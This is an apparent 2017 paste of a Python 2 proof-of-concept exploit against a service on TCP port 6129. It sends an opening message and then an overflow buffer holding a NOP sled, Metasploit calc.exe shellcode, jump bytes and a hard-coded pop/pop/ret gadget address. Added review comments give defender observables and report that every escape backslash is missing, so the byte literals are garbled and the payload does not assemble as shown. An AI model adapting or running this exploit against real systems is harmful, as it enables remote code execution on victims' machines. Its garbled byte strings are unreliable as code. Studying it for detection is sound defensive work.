Untitled
Nov 19th, 2017
# Proof-of-concept exploit script written for Python 2 (print statements,
# str-typed byte buffers).  It connects to the host given on the command
# line at TCP port 6129, sends a fixed 40-byte first message, then a second
# much larger message whose body is a NOP sled, a Metasploit-generated
# windows/exec payload (CMD=calc.exe per the generator comment below), a
# short jump, a packed hard-coded address and a jump back into the sled.
#
# NOTE(review): the paste rendering has dropped the backslash from every
# escape sequence ("xba" where "\xba" was meant), so the literals as shown
# are plain ASCII text rather than the bytes the comments describe; the
# listing does not assemble the payload it documents as-is.
#
# Defender notes (all taken from the code below): the observable traffic is
# a client connection to TCP/6129 carrying a 40-byte opening message, then
# one message that begins with struct.pack("I", 0x9c44) and contains long
# runs of 0x90 and 0x00 padding.  The successful host-side effect per the
# payload comment would be the target process launching calc.exe.
import socket
import sys
import os        # unused in this script
import time      # unused in this script
import struct
import binascii
import random    # unused in this script

# windows/exec - 220 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
# CMD=calc.exe
# Payload bytes as emitted by the generator (see the NOTE above about the
# missing backslashes in this rendering).
sc = ""
sc += "xbax01xa8x4fx9exd9xcaxd9x74x24xf4x5ex29"
sc += "xc9xb1x31x31x56x13x03x56x13x83xeexfdx4a"
sc += "xbax62x15x08x45x9bxe5x6dxcfx7exd4xadxab"
sc += "x0bx46x1exbfx5ex6axd5xedx4axf9x9bx39x7c"
sc += "x4ax11x1cxb3x4bx0ax5cxd2xcfx51xb1x34xee"
sc += "x99xc4x35x37xc7x25x67xe0x83x98x98x85xde"
sc += "x20x12xd5xcfx20xc7xadxeex01x56xa6xa8x81"
sc += "x58x6bxc1x8bx42x68xecx42xf8x5ax9ax54x28"
sc += "x93x63xfax15x1cx96x02x51x9ax49x71xabxd9"
sc += "xf4x82x68xa0x22x06x6bx02xa0xb0x57xb3x65"
sc += "x26x13xbfxc2x2cx7bxa3xd5xe1xf7xdfx5ex04"
sc += "xd8x56x24x23xfcx33xfex4axa5x99x51x72xb5"
sc += "x42x0dxd6xbdx6ex5ax6bx9cxe4x9dxf9x9ax4a"
sc += "x9dx01xa5xfaxf6x30x2ex95x81xccxe5xd2x7e"
sc += "x87xa4x72x17x4ex3dxc7x7ax71xebx0bx83xf2"
sc += "x1exf3x70xeax6axf6x3dxacx87x8ax2ex59xa8"
sc += "x39x4ex48xcbxdcxdcx10x22x7bx65xb2x3a"

port = 6129  # fixed target port; only the host is taken from argv

# Python 2 argv handling: exactly one positional argument, the host name.
# Any other count prints the argument count and a usage line, then exits 1.
if len (sys.argv) == 2:
    (progname, host ) = sys.argv
else:
    print len (sys.argv)
    print 'Usage: {0} host'.format (sys.argv[0])
    exit (1)

# Plain blocking TCP socket with no timeout: a peer that accepts the
# connection but never answers leaves the script hung in recv() below.
csock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
csock.connect ( (host, int(port)) )

# First message, padded to exactly 40 bytes: a packed int, four filler
# bytes, the same double twice, then "C" padding.  `type` shadows the
# builtin and is only used for the two struct.pack calls.  Both packs use
# native byte order and size (no "<"/">" prefix).
type = 444.0
buf = struct.pack("I", 4400 ) #Init Version
buf += "xcc"*4
buf += struct.pack("d", type) #Minor Version
buf += struct.pack("d", type) #Minor Version (same comment on both lines in the original; which field each is meant to be cannot be told from here)
buf += (40 - len(buf)) * "C"
csock.send(buf)

# Second message body.  The shape -- sled, payload, padding to a fixed
# offset, 2-byte short jump, a packed address the author describes as a
# pop/pop/ret gadget, then a jump back -- looks like a handler-overwrite
# layout; NOTE(review): inferred from the author's comments, not
# verifiable from this script alone.
wstr = "x90" * 0x10 #nop sled (0x10 bytes)
wstr += sc #calc shellcode
wstr += "x90" * (0x2ac - 0x10 - len(sc)) # pad so sled + payload + pad is exactly 0x2ac bytes (a negative count yields "" in Python)
wstr += "xebx06xffxff" #short jump forward
wstr += struct.pack("I", 0x00401161 ) #pop pop return gadget -- hard-coded address, presumably tied to one specific target build
wstr += "x90" * 3 #nop
wstr += "xe9x6bxfaxffxff" #short jump back to shellcode
wstr += "E" * 0xbc  # 0xbc bytes of filler
wstr += ("%" + "x00" + "c" + "x00")*5  # five "%c" sequences with NUL bytes between the characters; purpose not stated in the script

buf = struct.pack("I", 0x9c44) #msg type
buf += wstr #payload
buf += "x00" * (0x200) #null bytes
csock.send(buf)

# Two blocking reads of up to 0x4000 bytes each, printed as hex.  The
# comment says both reads are needed, but nothing here inspects their
# contents or handles a short/empty reply.
print binascii.hexlify(csock.recv(0x4000)) #necessary reads
print binascii.hexlify(csock.recv(0x4000))

csock.close()